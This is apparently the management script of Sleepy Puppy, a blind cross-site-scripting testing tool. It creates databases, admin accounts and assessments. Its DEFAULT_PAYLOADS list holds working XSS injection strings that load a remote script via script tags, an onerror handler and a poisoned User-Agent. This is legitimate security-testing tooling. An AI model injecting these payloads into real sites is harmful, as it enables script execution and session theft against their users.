#!/usr/bin/env python
import os
import time
import json
import sys
import getpass
from random import randint
from flask_script import Command, Option
from flask_script.commands import ShowUrls, Clean
from flask.ext.script import Manager, Server
from sleepypuppy.admin.admin.models import Admin
from sleepypuppy import app, db
# flask-script manager bound to the application; the functions decorated with
# @manager.command below are registered on it as sub-commands and dispatched
# by manager.run() at the bottom of the file.
manager = Manager(app)
@manager.shell
def make_shell_context():
    """
    Return the names preloaded into the interactive shell.

    Only ``app`` is exposed; anything else has to be imported by hand
    inside the REPL.
    """
    return {'app': app}
@manager.command
def create_db():
    """
    Create every table declared by the application's SQLAlchemy models.
    """
    db.create_all()
@manager.command
def drop_db():
    """
    Drop every table declared by the application's SQLAlchemy models.

    Destructive: the call runs immediately, without a confirmation prompt.
    """
    db.drop_all()
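@manager.command
def create_login(login):
    """
    Create an admin account for ``login``, prompting for its password.

    The password is read twice with ``getpass`` rather than taken as a
    command-line argument. Nothing is written to the database when the
    login already exists, when the two entries differ, or when the
    password is empty.
    """
    # Single-argument print(...) behaves the same as the print statement on
    # Python 2 and is also valid on Python 3.
    print('creating admin user')

    if Admin.query.filter_by(login=login).count():
        print('user already exists!')
        return

    print("{}, enter your password!\n ".format(login))
    pw1 = getpass.getpass()
    pw2 = getpass.getpass(prompt="Confirm: ")

    if pw1 != pw2:
        # Stop here: falling through would reach db.session.add() with
        # admin_user never assigned and crash instead of reporting the error.
        print('passwords do not match!')
        return

    if not pw1:
        # Two empty entries compare equal, so they need their own check.
        print('password must not be empty!')
        return

    # NOTE(review): the plaintext password is handed to the Admin model;
    # presumably it is hashed there before storage -- confirm.
    admin_user = Admin(login=login, password=pw1)
    db.session.add(admin_user)
    db.session.commit()

    # Report success only once the commit has gone through.
    print('user: ' + login + ' created!')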
from collections import namedtuple
# One stock payload record; the field names match the keyword arguments that
# create_bootstrap_assessment passes to the Payload model.
DefaultPayload = namedtuple(
    'DefaultPayload',
    ['payload', 'url', 'method', 'parameter', 'notes'],
)

# Stock script-injection test strings attached to a bootstrap assessment.
# `$1` is a placeholder; presumably it is replaced with the callback script
# URL elsewhere in the application (the substitution is not in this file).
# NOTE(review): as listed here, 'Generic Encoded' and 'Generic Reversed'
# carry exactly the same strings as 'Generic' and 'Reversed' -- confirm
# against upstream whether an encoded form was lost.
DEFAULT_PAYLOADS = [
    DefaultPayload(
        payload='<script src=$1></script>',
        url=None,
        method='GET',
        parameter=None,
        notes='Generic',
    ),
    DefaultPayload(
        payload='</script><script src=$1>',
        url=None,
        method='GET',
        parameter=None,
        notes='Reversed',
    ),
    DefaultPayload(
        payload='<script src=$1></script>',
        url=None,
        method='GET',
        parameter=None,
        notes='Generic Encoded',
    ),
    DefaultPayload(
        payload='</script><script src=$1>',
        url=None,
        method='GET',
        parameter=None,
        notes='Generic Reversed',
    ),
    DefaultPayload(
        payload='''" onload="var s=document.createElement('script');s.src='$1';document.getElementsByTagName('head')[0].appendChild(s);" garbage="''',
        url=None,
        method='GET',
        parameter=None,
        notes='DOM Attribute Escape',
    ),
    DefaultPayload(
        payload="""'"><img src=x onerror="var s=document.createElement('script');s.src='$1';document.getElementsByTagName('head')[0].appendChild(s);">""",
        url=None,
        method='GET',
        parameter=None,
        notes='For where "<script" is banned',
    ),
    DefaultPayload(
        payload="""Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 '"><img src=x onerror="var s=document.createElement('script');s.src='$1';document.getElementsByTagName('head')[0].appendChild(s);">""",
        url=None,
        method='GET',
        parameter=None,
        notes='Promiscuous User Agent',
    ),
]
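@manager.command
def create_bootstrap_assessment(name="General", add_default_payloads=True):
    """
    Create the assessment ``name`` and optionally attach DEFAULT_PAYLOADS.

    When an assessment with that name already exists it is left untouched,
    so running the command again cannot attach the default payloads a
    second time.
    """
    from sleepypuppy.admin.assessment.models import Assessment
    from sleepypuppy.admin.payload.models import Payload

    if Assessment.query.filter(Assessment.name == name).first():
        # One formatted string: print("a", b, "c") shows a tuple when print
        # is a statement, as it is elsewhere in this file.
        print("Assessment with name {} already exists.".format(name))
        return

    assessment = Assessment(name=name)

    if add_default_payloads:
        # `default` is the namedtuple template and `Payload` the model row;
        # separate names keep the loop variable from being rebound mid-loop.
        for default in DEFAULT_PAYLOADS:
            assessment.payloads.append(
                Payload(
                    payload=default.payload,
                    url=default.url,
                    method=default.method,
                    parameter=default.parameter,
                    notes=default.notes
                )
            )

    db.session.add(assessment)
    db.session.commit()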
@manager.command
def list_routes():
    """
    Pretty-print each non-static URL rule with its view function's docstring.

    Gives a quick inventory of the endpoints the application exposes.
    """
    from pprint import pprint

    # Keyed by the rule string; a later rule with the same string replaces
    # an earlier one.
    docs_by_rule = {
        rule.rule: app.view_functions[rule.endpoint].__doc__
        for rule in app.url_map.iter_rules()
        if rule.endpoint != 'static'
    }
    pprint(docs_by_rule)
if __name__ == "__main__":
    # Register flask-script's stock helper commands next to the ones defined
    # in this file, then hand the command line to the manager.
    for command_name, command_cls in (("clean", Clean), ("show_urls", ShowUrls)):
        manager.add_command(command_name, command_cls())
    manager.run()